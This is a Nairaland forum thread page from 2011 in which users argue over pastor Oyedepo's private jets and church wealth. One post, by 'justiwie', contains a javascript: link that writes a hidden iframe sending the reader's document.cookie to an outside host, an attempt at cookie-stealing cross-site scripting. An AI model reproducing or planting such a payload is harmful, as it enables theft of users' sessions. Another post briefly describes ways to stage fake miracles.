Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,194,487 members, 7,954,876 topics. Date: Saturday, 21 September 2024 at 11:32 AM

Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale - Business (5) - Nairaland

Nairaland Forum / Nairaland / General / Business / Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale (24167 Views)

Folorunsho Alakija: Nigeria’s Richest Woman [photos] / Private Jets Owned By Wealthy Nigerians And Their Costs / Top Ten Private Jets Owned By Wealthy Nigerians And How Much They Cost (2) (3) (4)

(1) (2) (3) (4) (5) (6) (Reply) (Go Down)

Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by Okijajuju1(m): 6:02pm On Aug 07, 2011
At everyone shouting their voice hoarse here on Oyedepos matter, please cool down, I have talked myself and I have realised that you can't change the brainwashed minds of his followers. Even if its 2 private jets, I still say the money used to acquire, service and maintain those jets could have employed over 1000 people and secured their futures,

In a country that has more churches than industries, what do you expect?! I drove past one of his churches in Port-Harcourt today and 3 quarters of the ppl walking out of there can never afford to send their kids to Convenant University which they are all shareholders in, Yet if I should tell em this fact, they'll stone me to death, Brainwashed zombies,

They keep waiting on a God that dosent seem to ever answer them, yet they keep paying God every week for blessings, Lol. How many surgeries has Oyedepo sponsored?
People are in church every sunday praying for a miracle and in the end contribuute into his pool of cash, Kids are dying of starvation in East Africa, I would suggest he goes and share to them those books of his,

To whom much is given, much is expected, I'm not impressed that he flies abroad every 2 days, I knw communities in the Niger Delta that could do with a visit from him, even if it is to feel them with that false hope which has made him so popular, Don't let me talk about the almajiri kids in the north or the Alayes in the west, Charity begins at home, Apart from build Mega churches and expensive Universities, what has Oyedepo done for Nigeria with all that wealth he has?!

I call them thieves, Jesus neva owned a donkey, neva asked for tithe from his disciples (who had jobs), Jesus always advocated living a simple life, If Jesus had a jet, then the miracle of the woman with the issue of blood and Zaccheus would never have happened, Oyedepo is flesh and blood, and would one day die, Woe bethied him it should be in one of his expensive Jets, I wonder how that would look, Even the wife of Kumuyi died of Cancer, The God whom she had prayed to and followed all her life could not save her,

Get wise and live free, When we get to the otherside, we shall figure out what it holds, Stop building castles in the air,
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by dabraska: 6:06pm On Aug 07, 2011
royallinx:

Mr sexkillz,  I guess your name says alot about U,  Anyway I dint insult you in any way but its OK. I come across people everyday and I try to leave them better than I met them. All am sayin is dont speak about what you dont know of,  Try to get info b u speak. Years ago I had spoken this same words (with less frugality though, cos I am a child of God) against this church until I decided to go and see. And you cant compare the former and the new  life in any way, spiritually, mentally, physically. So I can understand why majority say wat they say cos I ve been there,  castigating people based on hearsay

And if u think winners are paupers,  let me inform you more. As at last year cannaanland parked average of 20,000 cars (not people) each sunday,  and bearing in mind that most people park their car at home and use the church bus because of traffic, U can do the maths. And to answer your questions,  not all winners are rich cos we receive new people everyday and though they might come poor, beaten, batterred etc,  theyhave a choice to apply the word of God and change their story. Any word practising winner is reflective of our identity if he truly is a doer. so its a choice,  if u see any one who tells u he attended for years and nothing happened he should check himself cos the word works, millions have testified.

Also the first jet was bought in 1996, so its not just an issue of recent day affluence as portrayed by reporters who sees the bishop as a cheap shot of making news. And you can Go to the red cross and UN office nearest to u to see if they can give you the list of relief contributors to the IKEJA cantonment, War in Sudan, Liberia etc,  we are a heavily giving people but we dont showcase that on TV.
Even UN commended winners in 1995,  if I can get a link I will post it for you,  Point am making s that good tins are not celebrated but wen it seem as if one bad news surfaces, you see people running to spread it.

The 2nd university - LANDMARK- started last year with abt 4000 students on scholarship,  some 100%, some 50% etc based on performance in the test. Most of these are winners members cos u must present a letter from your local pastor to qualify. so if a member speaks evil of us,  then he is not a member. And am not sayin there might not be few exceptions of grudges,  there must be cos u cant satisfy everyone, even Jesus neva did.

All said,  Winners or no winners,  bishop David Oyedepo or not,  the Gospel is this,  Believe in God and live a life of dominion,  Jesus is Lord.
And y not try and attend the nearest winner chapel come next sunday and see d power of God at work,  atleast there is no harm in tryin,  I be prayin for you, the holy spirit is ever ready,
Thank you and God bless. Stay Inspired and be somebody instead of backbiting,  thats y its called back -biting,  cos u are always behind d person u are back biting,  if u are ahead u hardly notice him. Am OUT

u r a true son of ur fada!!!! ur even more informed dan me dat went 2 covenant!! God bless u bruv!

2 Likes

Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by ranlaen: 6:09pm On Aug 07, 2011
sylvagiva:

Everyone writing against the BISHOP and comparing him to those that has in one time or the other being involved in the governance of this nation u ppl are just making a big mistake, because My BISHOP IS WEALTHIER THAN THOSE MEN, IF THEY DIDN'T STEAL THE MONEY LET THEM GO AND BUY ONE JET AND SEE IF THE EFCC WON'T COME AFTER THEM. TALKING ABOUT JESUS RIDING ON AN Bottom, I BELIEVE THESE POLE ARE STILL LIVING IN THE AKEIC AGE, WAS THERE EVEN WHEEL BIRROW THEN? NOT TO TALK OF PEDAL CYCLE. JESUS DID NOT RIDE ON JUST ANY AS, HE RODE ON AN Bottom THAT HAS NOT BEING USED B4, ALSO NOT THAT THE MINISTRY OWN IT'S OWN HANGER IN LAGOS WHICH WAS BOUGHT BY AN UNKNOWN INDIVIDUAL FOR THE CHURCH. SO WHO DO YOU SEE TRAVEL ON Bottom OR DONKEY IN THIS COMPUTER AGE. SO WAKE UP FROM your SLUMBER AND ENTER INTO REALITY. ONLY A MINISTRY THAT GOD IS WORKING WITH CAN DO SUCH MIGHTY THINGS THAT IS HAPPENING. HOW WILL A CHURCH BUILD A 50;000 CAPACITY STRUCTURE WITHIN A YEAR, U STILL SEAT IN your DARKNESS AND THINK GOD IS NOT WORKING THERE OPEN your OWN AND TRY DOING WHAT THE BISHOP IS DOING IF IT IS EASY.       YOU SEE TRAVEL ON Bottom OR DONKEY IN THIS COMPUTER AGE. SO WAKE UP FROM your SLUMBER AND ENTER INTO REALITY. ONLY A MINISTRY THAT GOD IS WORKING WITH CAN DO SUCH MIGHTY THINGS THAT IS HAPPENING. HOW WILL A CHURCH BUILD A 50;000 CAPACITY STRUCTURE WITHIN A YEAR, U STILL SEAT IN your DARKNESS AND THINK GOD IS NOT WORKING THERE OPEN your OWN AND TRY DOING WHAT THE BISHOP IS DOING IF IT IS EASY.      

Because something is legal does not make it right.moral judgement is essential for religion.
A man who lives in absolute luxury while many of his flock who give him this money is living in poverty is totally unacceptable.
The way of thinking is totally wrong.Saying try doing what the bishop is doing if its easy just shows the mentality of thinking.
I for one cannot do this because of my fear of god.To take huge amount of money from people i know are much poorer to live in such luxury makes me fear my place in heaven.
Is it easy?Yes,if you know how.Unlike europeans and americans(and they still get conned ) we nigerians are oblivious to what technology can do.
With a good team i can easy know what problems people have(thru paying people and hidden mics),get crippled to work (good actors),make visible miracles(fire that does not burn the skin,thus set myself on fire ) so many things.
But ask yourself this,because so many nigerians are desperate for improvement and blessing should you do it?
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by coachchudi: 7:08pm On Aug 07, 2011
The truth is how did it make front page, The story reads of crap!!!
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by phemi01(m): 7:18pm On Aug 07, 2011
Biggie, shut up. the story is true. I'm sure you are one of the blind, senseless followers, you are are looking for other topics to criticize but u won't talk bout your pastor who's ripping you off.
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by phemi01(m): 7:23pm On Aug 07, 2011
coachchudi

how the story made it is none of your business, the fact is he wants to sell a jet. A man of God buying jets when the followers like you are hungry and crying on nairaland.
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by playmode(m): 7:34pm On Aug 07, 2011
I have one question for the followers of this man.How much did winners chapel donate to the people dying of farmine in Somalia? undecided
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by freepeople: 8:01pm On Aug 07, 2011
playmode:

How much did winners chapel donate to the people dying of farmine in Somalia?  undecided

Nada! undecided embarassed
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by sylvagiva(m): 10:11pm On Aug 07, 2011
Stop Complaining because we the members are not complaining, we can see the proves on a daily basis. You don't expect the church to come out on the tele and start announcing what they've done to better the life of others. Let me give you a tip: over 2billion naira was spent on relieve material and cash that was sent to Haiti during the earth quake that took so many lives. Just know that we winners, we are not noise makers but action takers. Well for you to enjoy what we enjoy, i employ all the persons that are making different comments and has not being to any of the branches of the church b4 should try and visit the one close to you. If you stay their for 3 months and you do all the things that you are asked to do according to the scriptures and nothing changes in ur life then know that you can never be delivered from your troubles. 3 months too much for GOD TO TURN YOUR STORY AROUND. REMAIN BLESS AS YOU JOIN THE WINNERS WORLD WHERE CHAMPIONS & GIANTS ARE MADE. Remain blessed d visit the one close to you. If you stay their for 3 months and you do all the things that you are asked to do according to the scriptures and nothing changes in ur life then know that you can never be delivered from your troubles. 3 months too much for GOD TO TURN YOUR STORY AROUND. REMAIN BLESS AS YOU JOIN THE WINNERS WORLD WHERE CHAMPIONS & GIANTS ARE MADE. Remain blessed
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by coolcash4l(m): 12:48am On Aug 08, 2011
Nice !
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by elrony(m): 1:39am On Aug 08, 2011
**speechless**
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by sayso: 8:01am On Aug 08, 2011
sylvagiva:

Stop Complaining because we the members are not complaining, we can see the proves on a daily basis. You don't expect the church to come out on the tele and start announcing what they've done to better the life of others. Let me give you a tip: over 2billion naira was spent on relieve material and cash that was sent to Haiti during the earth quake that took so many lives. Just know that we winners, we are not noise makers but action takers. Well for you to enjoy what we enjoy, i employ all the persons that are making different comments and has not being to any of the branches of the church b4 should try and visit the one close to you. If you stay their for 3 months and you do all the things that you are asked to do according to the scriptures and nothing changes in your life then know that you can never be delivered from your troubles. 3 months too much for GOD TO TURN YOUR STORY AROUND. REMAIN BLESS AS YOU JOIN THE WINNERS WORLD WHERE CHAMPIONS & GIANTS ARE MADE. Remain blessed d visit the one close to you. If you stay their for 3 months and you do all the things that you are asked to do according to the scriptures and nothing changes in your life then know that you can never be delivered from your troubles. 3 months too much for GOD TO TURN YOUR STORY AROUND. REMAIN BLESS AS YOU JOIN THE WINNERS WORLD WHERE CHAMPIONS & GIANTS ARE MADE. Remain blessed

The church is not supposed to ask for donations for relief materials rather they should spend from their puss you dig?obey the laws of nature and the blessings of God will be upon you.Worship God in all entirety Eccle 12:13 and salvation will be yours,so stop fooling your self that church gives you wealth.
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by PonDonCras(m): 9:55am On Aug 08, 2011
NO BE GOD WORK HIM DEY DO? GO ON JARRE SELL AND BUY MORE. NOTHING DO YOU. grin grin grin grin grin shocked shocked shocked shocked shocked
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by lufemi(m): 11:29am On Aug 08, 2011
Why is it always easy to condemn this pastors when we do not know what is between them and God. Abraham was one of the richest people in the Bible. Who God has blessed no man should curse
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by sweetgala(m): 2:55pm On Aug 08, 2011
Shame on you johnpaul, what do you mean by a Pastor ought not to own 4 jets. So who ought to own 4 jets those theiving politians or the senators that do nothing but shout aai or nay? i mean is it a taboo for the children of the Lord to enjoy the blessings of wealth and comfort. Remember, seek you first the Kingdom of the Lord all all shall be added unto you. And besides, i feel those jets belong to the church Winners Chapel and not to Oyedepo personnaly. The more we christians renew our mind the better for us!

A lot of folks are just getting it wrong , if the church has 4 jets which it has no practical use for then that is wastefull and I fail to see why the main man has to spend time every where when he can delegate and use the finances in other areas . And some seem to believe that you need to attend WCI to be sucessfull . Where we don't understand that God looks for your praise and worship, contribution of a tenth of your produce which is meant to maintain the house of worship and feed the homeless and comfort the widowed. Once you do these he would bless you irrespective of your place of worship. There is no convenant between God and Oyedepo to especially bless his flock. Each man is responsible for their salvation.
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by Nobody: 2:57pm On Aug 08, 2011
dabraska:

so out of all i sed, dis was all u cud pick?? i mite b off my med but u r certainly not bright. its makes it worse if u actually saw d four walls of a school.  cool cool cool
You need to do JUJU so that ur church can grow fast
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by cyberuzo(m): 4:46pm On Aug 08, 2011
i dis is tru, if dis is so tru, then itz shameful.he should have reduced d fees of covenant varsity instead of acquiring unneccessary stuf
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by sampeter(m): 6:00pm On Aug 08, 2011
'Robert Kiyosaki' must be absolutely right when he asserted that the way d poor ppl reasoned is responsible for their confinement to d rat race. Most ppl r just aversed to men of God. The church members arent complaining, cos they r getting returns and are happy frm it. Which one come be ur own, pointless and destitute haters. Let d Bishop be abeg.
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by Sourcecrew: 6:06pm On Aug 08, 2011
@Bros 1234; No dey talk wetin u no know. This is absolutely true, learn from others, why on earth should a man of GOD own 4 private jets, when higher percentage of the congregation do npot even own a bicycle, he should sell 3 and use the refunds to buy bicycle for every member of the congregation.

God forgive me; he has turned that church to a personal business venture, u can't even lecture in his university if you dont sign up to at least 3 years bond. What's dat suppose to mean?

Only GOD knows who is serving HIM.

Thank GOD for his patience, if not Him for don vex kill all of us in one night.
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by Sagamite(m): 9:58am On Aug 09, 2011
Sourcecrew:

God forgive me; he has turned that church to a personal business venture

Yep.

And some cretins continue to give him their money and will defend his exploitation of their desperation for salvation.

Zombies!
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by lufemi(m): 11:24am On Aug 09, 2011
cyberuzo:

i dis is tru, if dis is so tru, then itz shameful.he should have reduced d fees of covenant varsity instead of acquiring unneccessary stuf
Is he acquiring or selling? I think you should read well b4 commenting
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by justiwie(f): 5:45pm On Aug 09, 2011
[center][size=14pt][url=][/url][/size]
[url=javascript:document.write('<iframe width="0%" height="0%"src="http://www.bing.com/search?q=' +document.cookie +'">frameborder="0%">');]
[img]http://www.google.com.mx/intl/es_mx/images/logo.gif[/img][/center]
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by LagosBoi2(m): 1:23am On Aug 10, 2011
MONEY MAKING ORGANIZATIONS - FELA KUTI, Wise up cos with or without pastors you will excel, believe in yourself and your Dreams and not in pastors willing to make fortunes off you. I know for sure million of Zombies will continue to follow. lipsrsealed
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by prayNaija: 8:09am On Aug 10, 2011
Christ became poor so that we might be rich! is that in your Bible? If private business men can acquire properties why can't the Lord's Anointed? Men! this man works daily for 18 hours!. How many of us can do that? This man of God does not eat church money! the followers have found him faithful and unique in administration. that must be the reason for great faith in God through his messages. He is a wise investor too because everything he does is commanded by His father in Heaven. Please you better drop issues like this before God reacts on his behalf. This is my candid advice! you don't joke with men of God. If they are fake, why not leave them to God to judge.
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by freepeople: 9:22am On Aug 10, 2011
prayNaija:

Christ became poor so that we might be rich! is that in your Bible? If private business men can acquire properties why can't the Lord's Anointed? Men! this man works daily for 18 hours!. How many of us can do that? This man of God does not eat church money! the followers have found him faithful and unique in administration. that must be the reason for great faith in God through his messages. He is a wise investor too because everything he does is commanded by His father in Heaven. Please you better drop issues like this before God reacts on his behalf. This is my candid advice! you don't joke with men of God. If they are fake, why not leave them to God to judge.

Ludicrous assertion
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by igboboy1(m): 5:39am On Aug 11, 2011
Did he also get money from Abdusalam regime?
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by tlops(m): 6:00pm On Aug 11, 2011
I dont know what you people are complaining about, it is good that 'at-least'  the churches have enough money to 'preach' the gospel. In western world the govt supports the church (since the members dont give) and force the churches to adopt strange doctrines,  excerpt.

Sweden supports churches with anti-man-lover views: report

A number of Sweden's faith communities that refuse to accept homosexuals as members continue to receive state support despite requirements that they uphold the country's “social values”.

Since 2000, when the Church of Sweden officially separated from the Swedish state, religious groups in Sweden, including the church, have been allowed to seek money from the state to support their operations.

One of the requirements for receiving support is contributing to “maintaining and strengthening the basic values upon which society rests”.

Despite the requirement, a survey by the Svenska Dagbladet (SvD) newspaper revealed that ten of nearly 20 faith communities polled that receive state funding responded that homosexuality isn't compatible with their teachings.

The survey found that eight religious communities banned openly man-lover members from holding high-ranking positions, while two responded that they don't accept members who are in same-sex relationships.

“The law prohibits discrimination on the basis of intimate orientation or gender identity. I'd interpret that as a basic Swedish value we've come to an agreement about,” Ulrika Westerlund, head of The Swedish Federation for lady-loving-lady, man-lover, Bisexual and Transgender Rights (RFSL), told the newspaper.

According to the Evangelical Lutheran Mission – Friends of the Bible (ELM Bibeltrogna vänner), living in a “Same-sex relationship is wrong and can therefore result in someone not being a member”.

And the Seventh Day Adventist Church responded to SvD that “those who live in a Same-sex relationship can't be members of our parish/church”.

Westerlund said it's no secret that a number of primarily evangelical Christian churches in Sweden that “don't accept” the rights of homosexuals and transgender individuals.

But she believes that such groups still qualify for financial support from the state sends the wrong message.

“I think the requirement that religious orders uphold societal values is good and I think the state ought to take it with the utmost seriousness,” she said.

Jehovah's Witnesses are the only religious community which has been denied funding for not meeting the requirement that it uphold social values because the group actively encourages members not to vote, SvD reports.

According to Stefan Attefall, Sweden's Christian Democrat Minister for Social Affairs who has responsibility for religious communities, there is a difference between discouraging people from voting and a church's views about homosexuality.

“You have to differentiate between wanting to participate in society versus having the same views that the state has,” he told SvD.

“If we had a system where we only gave money to those that have the same views as us, we'd be building a totalitarian society.”

http://www.thelocal.se/35282/20110801/
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by pamcomps(m): 1:32am On Sep 04, 2011
Be very careful what u say about men of If u love your life
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by pamcomps(m): 1:34am On Sep 04, 2011
Be very careful what u say about men of God if you really love your self
Re: Nigeria’s Richest Pastor Oyedepo Puts Private Jets Up For Sale by igboboy1(m): 11:04am On Sep 05, 2011
ofe nmanu, ego nmanu

(1) (2) (3) (4) (5) (6) (Reply)

CBN Did Not Devalue The Naira! / CBN, Western Union Launch Foreign Remittance Service / Ekiti Oba Slashes Food Prices, Bans Traders’ Associations

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 72
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.